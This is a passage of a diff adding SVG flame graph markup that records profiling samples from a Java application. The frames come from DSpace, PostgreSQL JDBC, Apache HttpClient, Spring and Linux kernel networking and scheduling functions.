+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="543.0" y="789" width="3.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="546.04" y="799.5" ></text>
+</g>
+<g >
+<title>tcp_stream_memory_free (1 samples, 0.09%)</title><rect x="361.4" y="1189" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="364.42" y="1199.5" ></text>
+</g>
+<g >
+<title>generic_update_time (2 samples, 0.18%)</title><rect x="409.8" y="597" width="2.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="412.78" y="607.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::setColumn (1 samples, 0.09%)</title><rect x="573.1" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="576.13" y="943.5" ></text>
+</g>
+<g >
+<title>lookup_slow (1 samples, 0.09%)</title><rect x="11.1" y="1157" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="14.07" y="1167.5" ></text>
+</g>
+<g >
+<title>__softirqentry_text_start (1 samples, 0.09%)</title><rect x="735.4" y="677" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="738.41" y="687.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (7 samples, 0.64%)</title><rect x="853.6" y="805" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="856.62" y="815.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::equals (1 samples, 0.09%)</title><rect x="782.7" y="901" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="785.70" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::preProcess (3 samples, 0.27%)</title><rect x="555.9" y="885" width="3.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="558.94" y="895.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/convert/support/MapToMapConverter:::getConvertibleTypes (1 samples, 0.09%)</title><rect x="702.1" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="705.09" y="895.5" ></text>
+</g>
+<g >
+<title>__tcp_transmit_skb (144 samples, 13.11%)</title><rect x="195.9" y="1125" width="154.8" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="198.92" y="1135.5" >__tcp_transmit_skb</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="723.6" y="885" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="726.59" y="895.5" ></text>
+</g>
+<g >
+<title>sched_clock_cpu (1 samples, 0.09%)</title><rect x="798.8" y="853" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="801.82" y="863.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceResourceRestrictionPlugin:::additionalIndex (5 samples, 0.46%)</title><rect x="883.7" y="965" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="886.72" y="975.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketOutputStream_socketWrite0 (2 samples, 0.18%)</title><rect x="452.8" y="805" width="2.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="455.77" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.09%)</title><rect x="804.2" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="807.19" y="879.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1078.2" y="917" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="927.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="764.4" y="885" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="767.43" y="895.5" ></text>
+</g>
+<g >
+<title>perf_event_task_tick (1 samples, 0.09%)</title><rect x="436.6" y="677" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="439.65" y="687.5" ></text>
+</g>
+<g >
+<title>ip_local_out (1 samples, 0.09%)</title><rect x="1121.2" y="661" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1124.22" y="671.5" ></text>
+</g>
+<g >
+<title>do_IRQ (1 samples, 0.09%)</title><rect x="631.2" y="837" width="1.0" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="634.17" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/AbstractHttpEntity:::getContentType (1 samples, 0.09%)</title><rect x="380.8" y="949" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="383.77" y="959.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (2 samples, 0.18%)</title><rect x="760.1" y="853" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="763.13" y="863.5" ></text>
+</g>
+<g >
+<title>java/util/ArrayList$Itr:::next (1 samples, 0.09%)</title><rect x="1049.2" y="981" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1052.22" y="991.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="1032.0" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1035.02" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingConnection$PStmtKey:::hashCode (1 samples, 0.09%)</title><rect x="765.5" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="768.50" y="911.5" ></text>
+</g>
+<g >
+<title>new_sync_write (1 samples, 0.09%)</title><rect x="1139.5" y="757" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="1142.49" y="767.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (5 samples, 0.46%)</title><rect x="1035.2" y="869" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1038.25" y="879.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="799.9" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="802.89" y="959.5" ></text>
+</g>
+<g >
+<title>ipv4_conntrack_local (1 samples, 0.09%)</title><rect x="1078.2" y="85" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1081.23" y="95.5" ></text>
+</g>
+<g >
+<title>futex_wait (61 samples, 5.56%)</title><rect x="13.2" y="1221" width="65.6" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="16.22" y="1231.5" >futex_w..</text>
+</g>
+<g >
+<title>clone_endio (1 samples, 0.09%)</title><rect x="137.9" y="949" width="1.1" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="140.89" y="959.5" ></text>
+</g>
+<g >
+<title>__entry_text_start (1 samples, 0.09%)</title><rect x="371.1" y="1301" width="1.1" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="374.09" y="1311.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="877.3" y="869" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="880.27" y="879.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/DefaultConnectionReuseStrategy:::keepAlive (2 samples, 0.18%)</title><rect x="1071.8" y="933" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1074.79" y="943.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::hasNext (1 samples, 0.09%)</title><rect x="752.6" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="755.60" y="959.5" ></text>
+</g>
+<g >
+<title>update_process_times (1 samples, 0.09%)</title><rect x="436.6" y="709" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="439.65" y="719.5" ></text>
+</g>
+<g >
+<title>autoremove_wake_function (1 samples, 0.09%)</title><rect x="137.9" y="709" width="1.1" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="140.89" y="719.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="735.4" y="885" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="738.41" y="895.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$CharProperty:::study (2 samples, 0.18%)</title><rect x="921.3" y="741" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="924.33" y="751.5" ></text>
+</g>
+<g >
+<title>__ext4_get_inode_loc (1 samples, 0.09%)</title><rect x="409.8" y="517" width="1.1" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="412.78" y="527.5" ></text>
+</g>
+<g >
+<title>ip_queue_xmit (1 samples, 0.09%)</title><rect x="1121.2" y="693" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1124.22" y="703.5" ></text>
+</g>
+<g >
+<title>tcp_connect (1 samples, 0.09%)</title><rect x="1078.2" y="613" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1081.23" y="623.5" ></text>
+</g>
+<g >
+<title>perf_event_sched_in (1 samples, 0.09%)</title><rect x="1111.5" y="677" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="1114.55" y="687.5" ></text>
+</g>
+<g >
+<title>Java_java_io_FileOutputStream_writeBytes (3 samples, 0.27%)</title><rect x="1137.3" y="901" width="3.3" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1140.34" y="911.5" ></text>
+</g>
+<g >
+<title>ip_local_deliver (62 samples, 5.65%)</title><rect x="236.8" y="837" width="66.6" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="239.76" y="847.5" >ip_loca..</text>
+</g>
+<g >
+<title>java/util/regex/Pattern$CharProperty:::match (1 samples, 0.09%)</title><rect x="846.1" y="885" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="849.10" y="895.5" ></text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.09%)</title><rect x="177.7" y="1061" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="180.65" y="1071.5" ></text>
+</g>
+<g >
+<title>generic_write_end (1 samples, 0.09%)</title><rect x="1139.5" y="677" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1142.49" y="687.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1078.2" y="869" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="879.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (13 samples, 1.18%)</title><rect x="1176.0" y="1269" width="14.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1179.03" y="1279.5" ></text>
+</g>
+<g >
+<title>do_filp_open (1 samples, 0.09%)</title><rect x="11.1" y="1221" width="1.0" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="14.07" y="1231.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$5:::isSatisfiedBy (1 samples, 0.09%)</title><rect x="1144.9" y="917" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1147.86" y="927.5" ></text>
+</g>
+<g >
+<title>java/net/PlainSocketImpl:::socketSetOption0 (1 samples, 0.09%)</title><rect x="1091.1" y="917" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1094.13" y="927.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Ques:::study (1 samples, 0.09%)</title><rect x="921.3" y="677" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="924.33" y="687.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (4 samples, 0.36%)</title><rect x="811.7" y="869" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="814.71" y="879.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/GenericTypeResolver:::doResolveTypeArguments (12 samples, 1.09%)</title><rect x="666.6" y="885" width="12.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="669.63" y="895.5" ></text>
+</g>
+<g >
+<title>schedule (1 samples, 0.09%)</title><rect x="137.9" y="1253" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="140.89" y="1263.5" ></text>
+</g>
+<g >
+<title>bio_endio (1 samples, 0.09%)</title><rect x="137.9" y="869" width="1.1" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="140.89" y="879.5" ></text>
+</g>
+<g >
+<title>__tcp_transmit_skb (1 samples, 0.09%)</title><rect x="1121.2" y="709" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="1124.22" y="719.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (17 samples, 1.55%)</title><rect x="845.0" y="933" width="18.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="848.03" y="943.5" ></text>
+</g>
+<g >
+<title>activate_task (12 samples, 1.09%)</title><rect x="258.3" y="613" width="12.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="261.25" y="623.5" ></text>
+</g>
+<g >
+<title>lock_sock_nested (1 samples, 0.09%)</title><rect x="164.8" y="1189" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="167.75" y="1199.5" ></text>
+</g>
+<g >
+<title>java/text/SimpleDateFormat:::format (2 samples, 0.18%)</title><rect x="487.2" y="821" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="490.16" y="831.5" ></text>
+</g>
+<g >
+<title>JVM_InternString (5 samples, 0.46%)</title><rect x="657.0" y="773" width="5.3" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="659.96" y="783.5" ></text>
+</g>
+<g >
+<title>rcu_core (1 samples, 0.09%)</title><rect x="964.3" y="821" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="967.32" y="831.5" ></text>
+</g>
+<g >
+<title>nf_conntrack_in (6 samples, 0.55%)</title><rect x="213.1" y="1013" width="6.5" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="216.11" y="1023.5" ></text>
+</g>
+<g >
+<title>inet_shutdown (1 samples, 0.09%)</title><rect x="1121.2" y="789" width="1.1" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="1124.22" y="799.5" ></text>
+</g>
+<g >
+<title>irqtime_account_irq (1 samples, 0.09%)</title><rect x="77.7" y="1093" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="80.70" y="1103.5" ></text>
+</g>
+<g >
+<title>swapgs_restore_regs_and_return_to_usermode (1 samples, 0.09%)</title><rect x="1083.6" y="837" width="1.1" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="1086.61" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (3 samples, 0.27%)</title><rect x="536.6" y="853" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="539.59" y="863.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (7 samples, 0.64%)</title><rect x="853.6" y="837" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="856.62" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/DefaultClientConnection:::close (1 samples, 0.09%)</title><rect x="1122.3" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1125.30" y="943.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (61 samples, 5.56%)</title><rect x="13.2" y="1285" width="65.6" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="16.22" y="1295.5" >entry_S..</text>
+</g>
+<g >
+<title>finish_task_switch (1 samples, 0.09%)</title><rect x="137.9" y="1221" width="1.1" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="140.89" y="1231.5" ></text>
+</g>
+<g >
+<title>java/util/concurrent/ConcurrentHashMap:::putVal (1 samples, 0.09%)</title><rect x="1065.3" y="949" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1068.34" y="959.5" ></text>
+</g>
+<g >
+<title>org/dspace/browse/BrowseIndex:::getTableName (1 samples, 0.09%)</title><rect x="617.2" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="620.19" y="959.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::ReceiveTupleV3 (1 samples, 0.09%)</title><rect x="873.0" y="789" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="799.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.09%)</title><rect x="880.5" y="821" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="883.49" y="831.5" ></text>
+</g>
+<g >
+<title>__ip_queue_xmit (1 samples, 0.09%)</title><rect x="249.7" y="661" width="1.0" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="252.65" y="671.5" ></text>
+</g>
+<g >
+<title>__list_del_entry_valid (1 samples, 0.09%)</title><rect x="228.2" y="933" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="231.16" y="943.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="810.6" y="869" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="813.64" y="879.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="460.3" y="821" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="463.29" y="831.5" ></text>
+</g>
+<g >
+<title>schedule (30 samples, 2.73%)</title><rect x="100.3" y="1141" width="32.2" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="103.27" y="1151.5" >sc..</text>
+</g>
+<g >
+<title>rcu_core_si (1 samples, 0.09%)</title><rect x="964.3" y="837" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="967.32" y="847.5" ></text>
+</g>
+<g >
+<title>java/lang/StringCoding:::encode (1 samples, 0.09%)</title><rect x="1056.7" y="949" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1059.74" y="959.5" ></text>
+</g>
+<g >
+<title>ksys_write (2 samples, 0.18%)</title><rect x="1138.4" y="805" width="2.2" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1141.42" y="815.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="748.3" y="901" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="751.31" y="911.5" ></text>
+</g>
+<g >
+<title>ctx_sched_in (1 samples, 0.09%)</title><rect x="116.4" y="1061" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="119.39" y="1071.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractBeanFactory:::doGetBean (40 samples, 3.64%)</title><rect x="893.4" y="917" width="43.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="896.39" y="927.5" >org/..</text>
+</g>
+<g >
+<title>sk_forced_mem_schedule (1 samples, 0.09%)</title><rect x="172.3" y="1173" width="1.1" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="175.28" y="1183.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.09%)</title><rect x="11.1" y="1269" width="1.0" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="14.07" y="1279.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="873.0" y="901" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="1096.5" y="805" width="3.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1099.50" y="815.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.09%)</title><rect x="1121.2" y="837" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1124.22" y="847.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.09%)</title><rect x="821.4" y="805" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="824.38" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (21 samples, 1.91%)</title><rect x="1090.1" y="933" width="22.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1093.05" y="943.5" >o..</text>
+</g>
+<g >
+<title>tcp_rcv_established (1 samples, 0.09%)</title><rect x="165.8" y="1141" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="168.83" y="1151.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Begin:::match (1 samples, 0.09%)</title><rect x="803.1" y="901" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="806.11" y="911.5" ></text>
+</g>
+<g >
+<title>jbyte_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="456.0" y="821" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="458.99" y="831.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.09%)</title><rect x="760.1" y="821" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="763.13" y="831.5" ></text>
+</g>
+<g >
+<title>nf_nat_packet (1 samples, 0.09%)</title><rect x="220.6" y="997" width="1.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="223.64" y="1007.5" ></text>
+</g>
+<g >
+<title>__kfree_skb (2 samples, 0.18%)</title><rect x="284.0" y="709" width="2.2" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="287.04" y="719.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::hashCode (1 samples, 0.09%)</title><rect x="865.4" y="917" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="868.45" y="927.5" ></text>
+</g>
+<g >
+<title>sock_sendmsg (187 samples, 17.03%)</title><rect x="161.5" y="1237" width="201.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="164.53" y="1247.5" >sock_sendmsg</text>
+</g>
+<g >
+<title>call_stub (7 samples, 0.64%)</title><rect x="1101.9" y="773" width="7.5" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="1104.88" y="783.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.09%)</title><rect x="808.5" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="811.49" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="878.3" y="901" width="3.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="881.34" y="911.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.09%)</title><rect x="77.7" y="1141" width="1.1" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="80.70" y="1151.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::intern (6 samples, 0.55%)</title><rect x="657.0" y="789" width="6.4" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="659.96" y="799.5" ></text>
+</g>
+<g >
+<title>java/util/concurrent/ConcurrentHashMap:::transfer (1 samples, 0.09%)</title><rect x="554.9" y="853" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="557.86" y="863.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="827.8" y="789" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="830.83" y="799.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.09%)</title><rect x="740.8" y="741" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="743.78" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="867.6" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.60" y="927.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_disable_all (1 samples, 0.09%)</title><rect x="100.3" y="1029" width="1.0" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="103.27" y="1039.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (205 samples, 18.67%)</title><rect x="148.6" y="1285" width="220.3" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="151.63" y="1295.5" >do_syscall_64</text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="1026.6" y="821" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1029.65" y="831.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (8 samples, 0.73%)</title><rect x="852.6" y="885" width="8.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="855.55" y="895.5" ></text>
+</g>
+<g >
+<title>java/lang/StringCoding:::decode (2 samples, 0.18%)</title><rect x="775.2" y="917" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="778.17" y="927.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.09%)</title><rect x="1018.1" y="837" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="1021.05" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (9 samples, 0.82%)</title><rect x="1079.3" y="933" width="9.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1082.31" y="943.5" ></text>
+</g>
+<g >
+<title>jshort_arraycopy (1 samples, 0.09%)</title><rect x="1132.0" y="997" width="1.0" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1134.97" y="1007.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1121.2" y="885" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1124.22" y="895.5" ></text>
+</g>
+<g >
+<title>tcp_v6_conn_request (1 samples, 0.09%)</title><rect x="1078.2" y="213" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1081.23" y="223.5" ></text>
+</g>
+<g >
+<title>__entry_text_start (1 samples, 0.09%)</title><rect x="83.1" y="1301" width="1.1" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="86.08" y="1311.5" ></text>
+</g>
+<g >
+<title>java/net/SocketTimeoutException:::&lt;init&gt; (7 samples, 0.64%)</title><rect x="1101.9" y="757" width="7.5" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1104.88" y="767.5" ></text>
+</g>
+<g >
+<title>sockfd_lookup_light (4 samples, 0.36%)</title><rect x="362.5" y="1237" width="4.3" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="365.50" y="1247.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (5 samples, 0.46%)</title><rect x="657.0" y="757" width="5.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="659.96" y="767.5" ></text>
+</g>
+<g >
+<title>__x64_sys_poll (6 samples, 0.55%)</title><rect x="547.3" y="773" width="6.5" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
